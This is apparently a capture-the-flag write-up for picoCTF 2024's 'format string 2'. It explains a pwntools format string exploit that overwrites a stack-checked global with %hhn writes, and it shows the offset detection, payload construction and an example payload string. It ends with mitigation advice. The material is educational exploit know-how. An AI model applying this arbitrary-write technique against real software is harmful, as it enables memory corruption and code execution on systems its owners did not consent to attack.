format string 2 picoCTF 2024 Solution

Published: April 3, 2024

Description

This program is not impressed by cheap parlor tricks like reading arbitrary data off the stack. To impress this program you must change data on the stack!

Pwntools exploit

Download vuln/vuln.c for local analysis and install pwntools.

Interact with the remote instance at rhea.picoctf.net 64167.

bash
wget https://artifacts.picoctf.net/c_rhea/15/vuln && \
wget https://artifacts.picoctf.net/c_rhea/15/vuln.c && \
pip install pwntools && \
nc rhea.picoctf.net 64167
This is the culmination of the format string series. After learning format specifiers in format string 0 and stack leaking in format string 1, you now use pwntools to overwrite memory and control program flow. The Buffer Overflow and Binary Exploitation guide covers the fmtstr_payload technique used here alongside stack overflows and heap exploitation.
  1. Step 1Find the offset
    Use pwntools' FmtStr + exec_fmt helper to spray %p until the library auto-detects the correct stack offset.
    bash
    autofmt = FmtStr(exec_fmt); offset = autofmt.offset
    Learn more

    pwntools is a Python CTF framework and exploit development library. Its FmtStr class automates format string exploitation by automatically determining the stack offset where the format string itself appears. This is crucial because the %n write technique requires knowing the exact position of a controlled address on the stack.

    The exec_fmt callback connects FmtStr to the remote service: it sends a format string payload, receives the output, and returns it so FmtStr can parse the leaked values. The library sends a series of test payloads with a unique marker, then searches the leaked stack values for that marker to determine the offset automatically.

    Knowing the offset enables direct parameter access: the format specifier %15$p reads the 15th argument directly. This is essential for the write technique, where you embed a target address at a known offset in the format string and then write to it using %N$n (which writes the number of characters printed so far to the address at argument N).

    The offset varies by binary because it depends on how much stack space the calling function uses before calling printf. Different compilers, optimization levels, and function prologues all affect the offset. This is why dynamic detection (rather than hardcoding) is the robust approach.

  2. Step 2Craft the overwrite
    Generate a payload that writes 0x67616c66 ("flag") into address 0x404060 (the sus global). fmtstr_payload handles the padding for you.
    bash
    payload = fmtstr_payload(offset, {0x404060: 0x67616c66})
    Learn more

    The %n format specifier is uniquely dangerous: instead of printing something, it writes the number of characters printed so far into the integer pointed to by the corresponding stack argument. By controlling how many characters are printed (via width specifiers like %100d) and controlling what address is on the stack at the right offset, an attacker can write arbitrary values to arbitrary memory.

    fmtstr_payload() constructs the entire format string automatically: it places the target address(es) in the string at the correct stack offset, uses %hhn (1 byte) / %hn (2 bytes) / %n (4 bytes) with carefully calculated width values to write the desired integer.

    Why byte-chunking matters on a network: a single %n for a 4-byte write must first print the literal value as characters, so writing 0x67616c66 = ~1,734,437,990 chars across a socket is a non-starter. Splitting the write into four %hhn bytes caps the total padding around 1,000 chars (each byte rolls modulo 256), turning a multi-hour transfer into milliseconds. See the format string guide for the full %hhn byte-write derivation.

    Goal: write 0x67616c66 ("flag") to 0x404060.
    
    Naive 4-byte %n approach is too slow on the network because
    %n writes ALL FOUR BYTES at once - meaning we'd need to print
    0x67616c66 = 1,734,437,990 characters before the %n. Bad.
    
    fmtstr_payload's chunked-byte strategy:
    
      byte position    target byte    cumulative chars to print
      ---------------------------------------------------------
      0x404060 (lo)    0x66            0x66           = 102
      0x404061         0x6c            0x16c          = 364
      0x404062         0x61            0x261          = 609
      0x404063 (hi)    0x67            0x367          = 871
    
    We write each byte with %hhn after padding the running count
    up to the next target byte. The "rolling count" wraps at 256
    (byte width) so we just have to add enough %Nc each step.
    
    Resulting payload (simplified):
      [%102c%17$hhn]  + [%262c%18$hhn] + [%245c%19$hhn] + [%262c%20$hhn]
      + p64(0x404060) + p64(0x404061) + p64(0x404062) + p64(0x404063)

    Writing 0x67616c66 to address 0x404060 is a concrete example of arbitrary write - the most powerful primitive in binary exploitation. With arbitrary write, an attacker can overwrite: function pointers (to redirect code execution), return addresses (classic stack smashing), the Global Offset Table (to redirect library calls), or security-sensitive variables like the sus guard variable in this challenge.

    The value 0x67616c66 is the little-endian encoding of the ASCII string "flag": f=0x66, l=0x6c, a=0x61, g=0x67. Choosing a memorable ASCII value as the target makes it easy to verify the write succeeded by examining the variable in a debugger.

  3. Step 3Send and read
    Send the payload to the remote service. Once sus == 'flag', the program prints picoCTF{f0rm47_57r?_f0rm47_m3m_99...}.
    Learn more

    Sending the pwntools-crafted payload to the remote service completes the exploit chain. The binary receives the format string, passes it to printf, which processes the %n specifiers and writes "flag" into sus. Then the program checks if sus == "flag" and, finding it true, prints the flag.

    This demonstrates the full power of format string exploitation: starting from a single vulnerable printf(input) call, an attacker can read arbitrary memory (information disclosure) and write arbitrary memory (arbitrary code execution). The printf "write-what-where" primitive was one of the most exploited vulnerability classes in the 2000s.

    Modern mitigations that make format string exploits harder include: FORTIFY_SOURCE (catches some misuses at compile time), RELRO (makes the GOT read-only, preventing GOT overwrites), and PIE (randomizes binary base address, making hardcoded addresses invalid). However, format string bugs that leak stack data can bypass ASLR by revealing the randomized base address, then a second write payload can use the leaked address to target specific locations.

    pwntools makes exploit development faster and more reliable by handling the low-level details. Professional exploit developers use pwntools for CTF challenges and security research, but the underlying concepts - format string semantics, stack layout, address arithmetic - must be understood deeply to debug failures and adapt techniques to novel situations.

Flag

picoCTF{f0rm47_57r?_f0rm47_m3m_99...}

Once sus reads "flag", the binary happily prints the real flag.

How to prevent this

%n turns format string from a leak primitive into a write-what-where. The fix is identical; the consequences are worse.

  • Strip %n support entirely with FORTIFY_SOURCE=2 or by linking against a libc that omits it. Most production code never legitimately uses %n; turning it off costs nothing.
  • Enable full RELRO (-Wl,-z,relro,-z,now) so the GOT is read-only after startup. Even with arbitrary write, GOT-overwrite hijacks fail.
  • And the prerequisite: don't pass user input as the format string. Catch with -Werror=format-security; ban dynamic format strings in code review.

Want more picoCTF 2024 writeups?

Tools used in this challenge

Related reading

Do these first

What to try next